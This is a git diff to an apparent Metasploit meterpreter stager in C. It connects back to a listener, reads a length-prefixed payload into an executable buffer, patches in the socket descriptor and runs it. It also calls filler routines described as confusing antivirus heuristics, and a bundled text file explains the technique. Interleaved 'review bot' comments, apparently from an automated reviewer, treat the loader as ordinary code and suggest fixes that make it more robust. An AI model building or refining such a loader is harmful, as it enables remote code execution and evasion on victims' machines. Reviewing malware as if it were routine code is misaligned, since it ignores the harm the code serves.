diff --git a/.gitignore b/.gitignore index 092f515..1702a3a 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,9 @@ +################# +## Executable +################# +.exe +.o + ################# ## Eclipse ################# @@ -165,4 +171,4 @@ pip-log.txt # sublime text project files *.sublime-project -*.sublime-workspace \ No newline at end of file +*.sublime-workspace diff --git a/custom_meterp_bind.txt b/custom_meterp_bind.txt new file mode 100644 index 0000000..765e8d9 --- /dev/null +++ b/custom_meterp_bind.txt @@ -0,0 +1,21 @@ +* connect to the handler +* read a 4-byte length +* allocate a length-byte buffer +* mark it as writable and executable (on Windows you'll need VirtualProtect for this) +* read length bytes into that buffer +* jump to the buffer. easiest way to do this in C is cast it to a function pointer and call it. + +via egypt + +Assuming x86 arch, you have to make sure that the EDI register contains your socket descriptor (the value of the ConnectSocket variable). You can do this via inline asm, but it might be easier to just prepend the 5 bytes for setting it to your shellcode: + +BF 78 56 34 12  mov edi, 0x12345678 + +For 64 bit, you have to use the RDI register (and need 10 bytes): + +48 BF 78 56 34 12 00 00 00 00 mov rdi, 0x12345678 + +PS: This is the reason why the calling convention within Metasploit is +called "sockedi" + +Via Michael Schierl \ No newline at end of file diff --git a/loader.exe b/loader.exe deleted file mode 100755 index 05fa672..0000000 Binary files a/loader.exe and /dev/null differ diff --git a/main-timeobfs.c b/main-timeobfs.c index 7d4fe25..88b762a 100644 --- a/main-timeobfs.c +++ b/main-timeobfs.c 
@@ -132,67 +132,23 @@ int sandbox_evasion(){ //The metasploit-loader extracted into its own function. +//Works with 32 or 64 bit meterpreter depending on if ISX64 is defined or not void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){ ULONG32 size; char * buffer; void (*function)(); - winsock_init(); + #ifndef ISX64 + //Not 64 bit + int movCmdSize = 1; + int ptrSize = 4; + char movCmd[] = {0xBF}; + #else + //Is 64 bit + int movCmdSize = 2; + int ptrSize = 8; + char movCmd[] = {0x48,0xBF}; + #endif - //start the socket homie - SOCKET my_socket = wsconnect(listenerIP, listenerPort); - //receive 4 bytes which indicates the size of the next payload - int count = recv(my_socket, (char *)&size, 4, 0); - //check for issues - if (count != 4 || size <= 0) - Kick(my_socket, "bad length value\n"); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //allocate the RWX buffer - buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //check the buffer for issues - if (buffer == NULL) - Kick(my_socket, "bad buffer\n"); - //puts mov on to the front of the buffer - buffer[0] = 0xBF; - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //copies the socket pointer onto the buffer after 0xBF - //see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html - memcpy(buffer + 1, &my_socket, 4); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //receives the rest of the data 
from the socket (based on the size received before) - count = recv_all(my_socket, buffer + 5, size); - //cast the buffer as a function? - function = (void (*)())buffer; - //execute dat meterpreter - function(); -} - - -//The metasploit-loader for 64 bit systems -void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ - ULONG32 size; - char * buffer; - void (*function)(); winsock_init(); //start the socket homie @@ -209,7 +165,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ //================================ //allocate the RWX buffer - buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + buffer = VirtualAlloc(0, size + movCmdSize + ptrSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //================================ //burn out the clock, and confuse heuristics with some random number generation @@ -220,17 +176,16 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ if (buffer == NULL) Kick(my_socket, "bad buffer\n"); //puts mov on to the front of the buffer - buffer[0] = 0x48; - buffer[1] = 0xBF; + memcpy(buffer, movCmd, movCmdSize); //================================ //burn out the clock, and confuse heuristics with some random number generation genlol(); //================================ - //copies the socket pointer onto the buffer after 0x48 0xBF + //copies the socket pointer onto the buffer after the move command //see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html - memcpy(buffer + 2, &my_socket, 8); + memcpy(buffer + movCmdSize, &my_socket, ptrSize); //================================ //burn out the clock, and confuse heuristics with some random number generation 
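Review bot: The new `#ifndef ISX64` block at the top of reverse_tcp_meterpreter hard-codes `ptrSize` to 4 or 8 from a hand-maintained define, so a build where ISX64 does not match the real target word size silently emits a `mov` whose immediate width disagrees with the socket descriptor copied in later in the function, and the stage jumps through garbage. A compile-time guard catches that before it ships: `#if defined(ISX64) != defined(_WIN64)` / `#error "ISX64 must match the target architecture"` / `#endif`, and `ptrSize` is safer derived as `sizeof(SOCKET)` than written as a literal. The opcode arrays should also be `unsigned char`, since `0xBF` does not fit a signed `char` and its conversion is implementation-defined (the raw bit pattern is what is intended). The function's body continues past the end of this hunk.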
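Review bot: `size + movCmdSize + ptrSize` in the new VirtualAlloc call is evaluated in 32-bit unsigned arithmetic because `size` is a ULONG32 read straight off the socket, so a length close to 0xFFFFFFFF wraps to a tiny allocation while the later recv_all (outside this hunk) still tries to write `size` bytes into it. The earlier `size <= 0` check, visible only in the removed copy of the function in the first hunk and presumably kept in the surviving copy, rejects nothing but zero on an unsigned type. Cap the stage length before allocating, e.g. `if (size == 0 || size > MAX_STAGE_BYTES) Kick(my_socket, "bad length value\n");` with MAX_STAGE_BYTES set to the largest stage you expect, and widen the sum: `buffer = VirtualAlloc(0, (SIZE_T)size + movCmdSize + ptrSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);`. The enclosing function starts and ends outside this hunk.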
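Review bot: `memcpy(buffer + movCmdSize, &my_socket, ptrSize)` copies `ptrSize` bytes out of `my_socket`, but nothing ties `ptrSize` to the descriptor's actual width; if the literal is 8 on a 32-bit build it reads 4 bytes past the variable, and if it is 4 on a 64-bit build the high half of the handle is dropped. Using the object's own size removes the coupling: `memcpy(buffer + movCmdSize, &my_socket, sizeof my_socket);`, keeping `ptrSize` only for the buffer offset, or checking at compile time that the two agree. The comment on the preceding added line still says "socket pointer"; it is the descriptor value itself that is patched into the `mov` immediate (the bundled notes say the same), so `//copies the socket descriptor value into the mov immediate so the stage finds it in EDI/RDI` would be more accurate. The function starts and ends outside this hunk.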
@@ -238,7 +193,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ //================================ //receives the rest of the data from the socket (based on the size received before) - count = recv_all(my_socket, buffer + 10, size); + count = recv_all(my_socket, buffer + movCmdSize + ptrSize, size); //cast the buffer as a function? function = (void (*)())buffer; //execute dat meterpreter @@ -254,17 +209,9 @@ int main(int argc, char *argv[]) { //If command line parameters are given, use those instead of defaults. if(argc == 3){ - #ifdef ISX64 - reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2])); - #else - reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2])); - #endif + reverse_tcp_meterpreter(argv[1], atoi(argv[2])); }else{ - #ifdef ISX64 - reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort); - #else - reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort); - #endif + reverse_tcp_meterpreter(defaultListenerIP, defaultListenerPort); } return 0;
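Review bot: The return value of recv_all on the changed line is stored in `count` but never checked before `function()` is called two lines later, so a short or failed read leaves a partially filled RWX page that is executed anyway. recv_all is defined elsewhere in the file and its contract is not visible here, but assuming it returns the number of bytes received, `if (count != (int)size) Kick(my_socket, "short read\n");` placed before the cast would close that gap. Separately, once the stage has been received the page no longer needs to be writable; allocating PAGE_READWRITE and switching to PAGE_EXECUTE_READ with VirtualProtect before the call is the usual least-privilege step and avoids a long-lived RWX region. The enclosing function begins outside this hunk.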